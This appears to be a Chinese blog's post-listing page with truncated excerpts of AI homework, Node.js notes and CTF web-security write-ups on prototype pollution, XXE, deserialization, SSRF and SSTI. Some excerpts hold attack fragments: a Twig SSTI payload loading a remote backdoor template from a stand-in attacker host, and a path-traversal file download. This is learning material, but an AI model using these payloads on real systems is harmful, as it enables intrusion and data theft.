- 博客(70)
- 收藏
- 关注
RSS订阅原创 [作业/人工智能]作业6:CNN实现XO识别
文章目录前置说明所用数据集名词、模块介绍如何定义自己的网络?训练集和测试机划分构建模型和训练模型代码主体手动构建的神经网络训练过程中的损失函数测试模型 ,计算准确率模型的特征图源码结果输出卷积核源代码结果问题解决问题1问题2前置说明所用数据集所用数据集为XO图像名词、模块介绍可学习参数:在训练过程中,经过神经网络训练可以进行优化的参数,你如反向传播优化和更新权值。卷积层和全连接层的权重、bias、BatchNorm的γ、β。不可学习的参数(超参数):超参数是在开始学习过程之前设置值的参数,即框
2022-05-27 10:44:14
364
原创 [作业/人工智能]作业5 - CNN卷积、池化、激活测试
卷积、池化与激活手工实现测试程序import numpy as npx = np.array([[-1, -1, -1, -1, -1, -1, -1, -1, -1], [-1, 1, -1, -1, -1, -1, -1, 1, -1], [-1, -1, 1, -1, -1, -1, 1, -1, -1], [-1, -1, -1, 1, -1, 1, -1, -1, -1], [
2022-05-22 22:01:30
359
原创 [作业/人工智能] 作业4 CNN - 卷积
文章目录概念总结CNN的结构和各层次功能 卷积卷积核特征图(feature map)特征选择池化(Pooling)多通道神经层深度特征映射总结计算机中的色彩空间卷积核作用和原理探究常见卷积核类型锐化卷积核轮廓检测卷积核高斯卷积核水平边缘检测卷积核垂直边缘检测卷积核编程实现经典卷积核测试测试图片调整经典卷积核参数更多类型卷积核尝试彩色图片边缘检测色彩空间转换原图像图像信息方法-Canny边缘检测算法尝试进行边缘检测收获总结主要参考资料:《神经网络和深度学习》— 邱锡鹏所用测试图片来源于公开网络,无意侵犯创
2022-05-12 13:28:50
1209
2
原创 [作业/人工智能] 作业3:例题程序复现 PyTorch版
文章目录使用Pytorch复现课上例题对比【作业3】和【作业2】程序,是否相同,正确性如何?作业2程序修改、展示对比【作业2】与【作业3】的反向传播的实现方法激活函数使用Pytorch自带的torch.sigmoid()再修改激活函数为Relu损失函数MSE用PyTorch自带函数t.nn.MSELoss()替代损失函数修改为交叉熵函数改变步长权值w1-w8初始值换为随机数,对比【作业2】指定权值结果总结反向传播原理和编码实现使用Pytorch复现课上例题# https://blog.csdn.net/
2022-05-09 23:27:12
388
原创 [作业/人工智能]作业2-反向传播例题复现
非线性变换–Sigmoid对于任何函数,仅进行线性变换,最后都会统一为y = W * x + b的形式,这就导致线性变换的层数再多,也无法提高模型的效果,对于此问题,要使用非线性变换函数,例如Sigmoid函数,反向传播采用的求导方法–链式求导法则对于 H = f · g,可以利用复合函数上每一步的偏导数进行累积,最后求出整体导数反向传播算法的过程其过程总结为,“正向传播”求结果,“反向传播”回传误差,利用梯度寻求损失函数最小,为模型更新合适的权重,通过前向传播计算出结果,计算预测结果的
2022-05-01 21:52:13
1582
原创 [作业/人工智能]作业1-Pytorch实现反向传播
分享关于Python使用的一些个人分享,包管理在日常学习当中,我们完成任务一般只用到特定的库,且使用的Python版本不完全相同(尤其是一些仅存在于Python2.7的包),为了方便管理和打包,我们可以安装多个版本Python,每个只安装特定模块,完成特定任务(如机器学习相关算法)使用时在Pycharm中导入对应环境即可。另外,使用开源环境Anaconda3对于包管理十分有效,十分推荐用于机器学习、数学分析等相关工作。虚拟环境在项目开发时,还推荐使用Python的venv,它可以有效和本机
2022-05-01 13:20:51
2084
原创 [Nodejs]Nodejs基础补充(三)-this上下文对象
上下文对象this含义在Nodejs当中,上下文对象指的就是this指针,指的是用于调用当前可执行代码的引用,也就是被调用的函数所在的环境。【对于上下文这一概念的理解,我认为可以类比叙事类文章,在一段上下关联内的内容当中,this指向的主语大概率是固定的】this的作用在一个上下文环境调用他的对象本身(比如,在对象内部这个上下文环境,this指的是它对象本身);Js的函数都是依赖某个上层对象进行调用的。函数作为对象的方法调用时,this总是指向调用它的对象;示例使用样例对不同情况下的this变
2022-04-20 10:33:31
484
原创 [Nodejs]Nodejs基础学习(二)-模块机制
补充:关于Nodejs本身Nodejs不是一门语言、框架或者类库,他是一种运行时环境,它一个很大的贡献就是,使得JS代码的解释和执行从浏览器脱离,使用了V8引擎(代码执行效率很高),为JS带来了一些服务器特性,使用npm开源库生态系统进行包管理。模块机制参考资料:知乎@隐逸王,require() 方法详解模块机制的引出Nodejs遵循的是CommonJS规范,其核心要求是通过require来加载其他依赖的模块。每一个文件都是一个模块,拥有自己独立的作用域,变量,以及方法等,对其他
2022-04-20 10:32:32
173
原创 [Tools]Pwn中用于远程交互的库函数总结
Pwn中用于远程交互的库函数总结在比赛当中经常会与端口应用交互的场景,首先是PWN库的安装和使用,参考资料:pwntools — pwntools 4.9.0dev documentation安装pip install --upgrade pwntools导入from pwn import *简单IO函数进程创建p = process('/bin/sh')# 还可以在已经建立的连接,如IP连接和SSH连接上创建进程# 关闭进程p.close()远程连接主机端口host =
2022-04-19 20:02:55
2457
原创 [Web/Nodejs]原型链污染EJS模块的利用分析(附源码分析)
EJS _CVE-2019-10744(outputFunctionName)在EJS引擎当中,存在一个属性opts.outputFunctionName(注:影响该位置的源数据流实际上有很多个,这个属性利用条件相对宽松,只要有就能用)读源码ejs作为渲染引擎,包含一些代码执行的功能,帮助将执行结果回显到页面。【以下代码为exports.render-----调用----->handleCache】首先调用了render的话(在我们做题时可以看到的表层函数)render调用的handl
2022-04-06 21:24:35
1717
1
原创 [WEB/Nodejs]原型链污染中lodash的利用方法分析
lodash.template显式的lodashs.merge存在原型链污染漏洞,为了对其进行利用,需要找到可以对原型进行修改的逻辑。options的sourceURLoptions是一个对象,sourceURL是通过下面的语句赋值的,options默认没有sourceURL属性,所以sourceURL默认也是为空。var sourceURL = 'sourceURL' in options ? '//# sourceURL=' + options.sourceURL + '\n' : '';给
2022-04-06 21:21:20
546
原创 [WEB/Nodejs]Nodejs原型链污染初窥
文章目录原型链污染原型链污染-前置内容:对象的构造三种方法和原型原型链污染-前置内容:原型链的继承原型链污染原理原型链污染手段入门示例原型链污染原型链污染-前置内容:对象的构造三种方法和原型对类原型操作的prototype对对象的类原型操作的__proto__function Foo() { this.name = '小红'}Foo.prototype.id = 123Foo.prototype.printl = function printl() { console.log
2022-04-06 21:20:30
1074
原创 [WEB/nodejs]Nodejs知识入门和子进程
文章目录入门内容Nodejs初步解构赋值事件绑定1.DOM绑定2.在JS绑定3. 绑定事件监听函数Callback回调函数子进程模块_函数child_process()参考链接入门内容Nodejs初步Nodejs是在服务器端运行的JS代码,跨平台JS的运行环境,采用V8引擎运行源代码,利用事件驱动、非阻塞、异步I/O模型等来提高运行的性能。使用多进程是扩展一个 Node 应用最好的方式,被设计用来通过很多节点创建分布式应用,这也是为什么被命名为 Node。解构赋值类似于解包,将对象或者数
2022-04-06 21:19:34
4375
原创 [BUU/Pickle/JWT] [CISCN2019 华北赛区 Day1 Web2]ikun
[CISCN2019 华北赛区 Day1 Web2]ikun能做出这道题的,一定是狂热ikun吧(滑稽业务逻辑漏洞import requestsurl = "http://ed0b4ae6-27c4-46f2-9281-8b0b0335be34.node4.buuoj.cn:81/shop?page="for i in range(200): if "lv6.png" in requests.get(url+str(i)).text: print(i)运行结果181
2022-03-23 10:31:48
1136
原创 [Web/反序列化]青龙组AreUSerialz+朱雀组-phpweb
反序列化两道题目难度不大,但也要认真审计青龙组AreUSerialz源码 <?phpinclude("flag.php");highlight_file(__FILE__);class FileHandler { protected $op; protected $filename; protected $content; function __construct() { $op = "1"; $filename
2022-03-12 16:11:46
690
原创 Bash重定向和反弹Shell相关
文章目录BASH重定向文件描述符一般重定向及特殊符号对文件描述符重定向组合型的重定向关于重定向需要重点强调的1.`&`用于表示该文件所指向的文件或流(&句柄号),而不再是该文件本身2.command `%>` file3.`cmd 0>1`和`cmd >file 0>&1`,文件和句柄4.`cmd >/dev/null 2>/dev/null`交互式Bash反弹shell测试Q/A问题1:问题2:参考链接:参考链接:BASH重定向文件描述符
2022-03-08 18:07:51
770
原创 [环境配置/PWN]Pwn相关工具安装记录
Web手,想要拓展下知识面,整理分享以下近期工具安装记录,转载还请注明来源换源建议先换源配置python2.7版本在做pwn相关工作时,我们最常用的Python版本就是2.7版。安装Python尽量使用aptitude,他相对apt的优势在于能够更好的处理依赖问题。sudo apt-get install aptitudesudo aptitude install python2.7补充:相对apt,此工具还可以进行install, remove, reinstall,并可以自动的处理依赖
2021-10-30 16:20:31
244
原创 [WP/Bilibili]程序员节Bilibili-sec1024安全题目
一年一度的BILIBILICTF又开始了。文章目录第一题第二题第三题第四题第五题主体窗口加密部分跑出原始字符串第六题第七题第一题1024程序员节,大家一起和2233参与解密游戏吧~happy_1024_2233:e9ca6f21583a1533d3ff4fd47ddc463c6a1c7d2cf084d3640408abca7deabb96a58f50471171b60e02b1a8dbd32db156第二题配置错误导致webpack泄露第三题<?php /*
2021-10-30 11:13:04
382
原创 [WP/命令注入]DASCTF Oct X 吉林工师 WEB1
DASCTF Oct X 吉林工师WEB1迷路的魔法少女:魔法少女迷失在了代码空间 请寻找她现在在哪源码 <?phphighlight_file('index.php');extract($_GET);error_reporting(0);function String2Array($data){ if($data == '') return array(); @eval("\$array = $data;"); return $array;}if(
2021-10-26 18:37:19
304
2
原创 [Tools]Windows下Binwalk安装和快捷调用
更新设备,重新安装了许多工具,这里总结下Binwalk的Windows安装和快速调用方法。介绍Binwalk是一个固件的分析工具,旨在协助研究人员对固件非分析,提取及逆向工程用处。简单易用,完全自动化脚本,并通过自定义签名,提取规则和插件模块,还重要一点的是可以轻松地扩展。我们可用它进行基本的嵌套文件的提取和文件分析、取证。下载源项目1.到https://github.com/devttys0/binwalk下载。2.使用Windosw下的GIT下载。git clone https://git
2021-10-24 19:41:10
1325
原创 [Linux/环境配置]软件版本管理工具update-alternatives指南
Linux版本管理update-alternatives可对注册服务的软链接进行管理,实现对软件版本的切换。注册部分update-alternatives --install link_path command_name executable-path priority 使用update-alternatives的install参数对软件进行注册服务,前两个参数是为python的PATH搜索目录的A和注册命令名称B(实际使用当中由B指向A,调用B即可完成对A的调用,这也是我们日常使用当中命令的
2021-10-21 09:55:00
1597
原创 [BUU/SSRF] [De1CTF 2019]SSRF Me
[De1CTF 2019]SSRF Me初审整理源代码#! /usr/bin/env python# #encoding=utf-8from flask import Flaskfrom flask import requestimport socketimport hashlibimport urllibimport sysimport osimport json# reload(sys)# sys.setdefaultencoding('latin1')app = Fla
2021-10-14 20:36:16
273
1
原创 [BUU/反序列化/Phar] [CISCN2019 华北赛区 Day1 Web1]Dropbox
注册登录,上传图片,可以下载文件,对文件下载进行抓包,此处可下载任意文件,filename=../../index.php找到class.php<?php class User { public $db; // 触发FileList的__call() public function __destruct() { $this->db->close(); }}class FileList { private $f
2021-10-14 17:18:34
207
原创 [WP/ctfshow/XXE]ctfshow_XXE_web373-378
外部实体注入WEB373// 允许加载外部实体libxml_disable_entity_loader(false);// xml文件来源于数据流$xmlfile = file_get_contents('php://input');if(isset($xmlfile)){ $dom = new DOMDocument(); // 加载xml实体,参数为替代实体、加载外部子集 $dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_
2021-10-13 22:07:50
907
原创 [WP/BUU/Web/反序列化] [MRCTF2020]Ezpop
源码Welcome to index.php<?php//flag is in flag.php//WTF IS THIS?//Learn From https://ctf.ieki.xyz/library/php.html#%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E9%AD%94%E6%9C%AF%E6%96%B9%E6%B3%95//And Crack It!class Modifier { protected $var; // 包
2021-10-13 22:03:24
156
原创 [WP/BUU] [0CTF 2016]piapiapia
**www.zip **可下载源码审计源码config.php暗示flag在本文件<?php $config['hostname'] = '127.0.0.1'; $config['username'] = 'root'; $config['password'] = ''; $config['database'] = ''; $flag = '';?>register.php注册逻辑<?php require_once('class.php'); if($_
2021-10-13 13:36:24
189
原创 [Web/基础/反序列化]反序列化轻量总结
文章目录反序列化序列化和反序列化序列化是什么?魔术方法三种类型的变量的表示方法(public,protected,private)基本反序列化破坏__Wakeup失效反序列化写链其他形式反序列化SESSION反序列化Session原理其反序列化字符逃逸Python反序列化`Phar`反序列化什么是`Phar`文件?`Phar`结构那么思路是什么呢?一些限制框架反序列化反序列化序列化和反序列化序列化是什么?我们在运行程序时变量是存在于内存当中的,为了保存他们,我们可以将其转化为有确定格式的、可传输、可
2021-10-12 00:16:36
370
原创 [WP/WEB/反序列化/未完]CTFshow-web257-268
Web257<?phpclass ctfShowUser{ private $username='xxxxxx'; private $password='xxxxxx'; private $isVip=false; private $class = 'info'; public function __construct(){ $this->class=new backDoor(); } public function
2021-10-12 00:05:45
896
原创 [Web/基础/DTD]XML-DTD的简要总结
文章目录XML-DTD的简要总结简介包含内容DTD引用方法元素元素声明的格式空元素任意内容的元素只包含PCDATA元素带有子元素(序列)的元素声明只出现一次的元素声明最少出现一次的元素声明出现零次或者多次的元素出现零次或一次的元素声明"非.../即..."声明混合型的内容属性简介声明属性方法属性类型表默认值表默认值列举属性值多属性值的声明实体简介预定义实体内部实体声明外部实体引用参数实体用法重要说明两种重要的文本形式PCDATACDATAXML-DTD的简要总结声明:本文部分DTD实例取自W3C教程。
2021-10-11 23:59:44
1570
原创 [WP/Buu/RCE]-[CISCN 2019 初赛]Love Math
[CISCN 2019 初赛]Love Math源码 <?phperror_reporting(0);//听说你很喜欢数学,不知道你是否爱它胜过爱flagif(!isset($_GET['c'])){ show_source(__FILE__);}else{ //例子 c=20-1 $content = $_GET['c']; if (strlen($content) >= 80) { die("太长了不会算"); }
2021-08-08 10:55:32
176
原创 [WP/BUU/SSRF/SQLI/反序列化] [网鼎杯 2018]Fakebook解题+分析
[网鼎杯 2018]Fakebook扫描测试,robots.txt 可读User-agent: *Disallow: /user.php.bak下载,源代码展示了UserInfo类,<?phpclass UserInfo{ public $name = ""; public $age = 0; public $blog = ""; public function __construct($name, $age, $blog) {
2021-07-31 05:23:12
245
原创 [WP/BUU/Unicode编码]BUUCTF Unicorn shop题解
[ASIS 2019]Unicorn shop测试商店页面,逻辑大致为输入相应的商品号和支付金额购买商品,用1号商品抓包测试,错误的商品,继续测试2、3均如此,直到4正常了但是钱不够,输入更多钱仅允许一个字符输入分析9999为四个字符,编码后也是如此9999%u0039%u0039%u0039%u0039因此,我们需要找到一个代指的数字超过1337.0的单个字符,我们从Unicode编码库中寻找https://www.compart.com/en/unicode/%u2
2021-07-31 05:21:19
347
原创 [WP/BUU/CTF]Cookie Store 题解
简单题,涉及Cookie的使用方法存储-Cookie-session-值base64解码eyJtb25leSI6IDUwLCAiaGlzdG9yeSI6IFtdfQ==// 解码{"money": 50, "history": []}后台通过base64存储用户信息,是及其危险的,可以伪造数据{"money": 100, "history": []}// 编码eyJtb25leSI6IDEwMCwgImhpc3RvcnkiOiBbXX0=替换Value,刷新,购买flag即可..
2021-07-31 05:18:42
427
原创 [Linux/CTF]Linux重要目录和文件总结
CTF中的重要文件总结(记得更新…)目录角度看文件结构目录预期的内容/bin二进制文件,存放了基本的指令,依据先后顺序。/sbin超级管理员专用指令,依据先后顺序。/usr用户安装的软件和文件。/usr/bin也存放指令,依据先后顺序。/usr/sbin也存放指令,依据先后顺序。/usr/local/系统用户级管理员在本机自行安装自己下载的软件。/root系统管理员用户root主目录。/home除root用户的所有用户文件存储
2021-07-30 21:58:40
907
原创 [Linux]Linux文件系统的理解总结
Linux文件系统的理解总结前言:在比赛当中,我们获取的flag文件并不总是在根目录、工作目录下,而是隐藏在了Linux系统当中某些位置。参考内容 : Linux中“一切皆文件”是什么意思?中刘长元大佬回答万物皆文件Linux中的一切对象都可以通过文件的方式访问、保存、管理。它体现了一种面向对象的设计思想。在Linux下,普通文件、目录、硬件设备、进程和资源甚至命令,都以文件的形式存在,如,我们可以通过读取文件的形式查看进程信息、管理设备或工具。一个解释实例观察下面的命令,ls /var
2021-07-30 17:11:14
146
原创 [Crypto/CTF]CTF Crypto 包函数和工具总结[ 2021/10/30更新]
Crypto 函数和工具总结(持续学习…)常用的库采用Anaconda创建虚拟环境安装,然后设置环境变量或者在Pycharm当中导入。Anaconda以管理员权限运行anaconda prompt(可解决UnsatisfiableError: The following specifications were found to be in conflict错误,即源未提供对应版本的依赖包,创建对应版本环境即可)conda create -n python3.9 xxx # 创建虚拟环境,附带安装
2021-07-27 22:12:42
2962
1
原创 [Web/IP]真实IP获取原理/客户端IP伪造测试
真实IP获取和客户端IP伪造近期比赛又做到了用户IP伪造的题目,想来不如就总结一下。为什么要确认IP?在Web应用下,部分逻辑需要确认用户的客户端IP。如对大量频繁发送危险请求的IP进行封禁。进行用户IP确认的方法有很多,但是部分方法降低了IP获取的难度,确牺牲了安全性,产生了IP可伪造的风险。服务器是如何确定IP的?REMOTE_ADDR标识发出请求的主机IP地址,代表客户端IP。这个标识完全由服务器决定,除了路由之外无法伪造,通过TCP协议根据直接请求来源的远程主机确定,服务端根据请求TC
2021-07-27 21:06:41
1928
1
原创 [WP/SSTI/PHP_Twig]Cookie is so stable解题/Twig模板注入
[BJDCTF2020]Cookie is so stablePHP-Twig模板注入参考了知乎大佬的文章:https://zhuanlan.zhihu.com/p/28823933通过_self我们可以调用环境变量中的env属性,当PHP打开远程加载文件的参数(allow_url_include)时,问我们可以通过它来实现远程文件包含{{_self.env.setCache("ftp://attacker.net:2121")}}{{_self.env.loadTemplate("backdoor
2021-07-23 01:11:44
580
1
原创 [前后端/Ajax/跨域] 前后端项目开发总结(1)-跨域和同源策略及解决方案/CORS/nginx转发
跨域与同源策略前段时间采用Vuejs前端框架+Element-ui组件库+Flask后端框架写了一个技术栈涵盖前后端+数据库的项目,在其中总结了大量知识,为了加深理解,决定分批次深入学习并总结下。其中一个重要问题,便是本篇要总结的跨域问题。问题产生在vue的开发过程中,需要利用请求访问后端api,完成数据的交互和功能的触发,此时vue与flask间为不同端口,产生了如下错误。跨域源请求拦截问题CORS头缺少’Access-Control-Allow-Origin’问题分析这是受限于浏览器的同源
2021-07-18 14:08:31
238
2
原创 [WEB/XXE/XML]XML初步学习笔记
XXE相关-XML学习笔记XML介绍可扩展标记语言,标准通用标记语言的子集,简称XML。是一种用于标记电子文件使其具有结构性的标记语言。标记指计算机所能理解的信息符号,通过此种标记,计算机之间可以处理包含各种的信息比如文章等。它可以用来标记数据、定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言。 它非常适合万维网传输,提供统一的方法来描述和交换独立于应用程序或供应商的结构化数据。XML和HTML的辨析差异XML指可扩展标记语言(EXtensible Markup Language),
2021-07-17 00:42:08
164
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人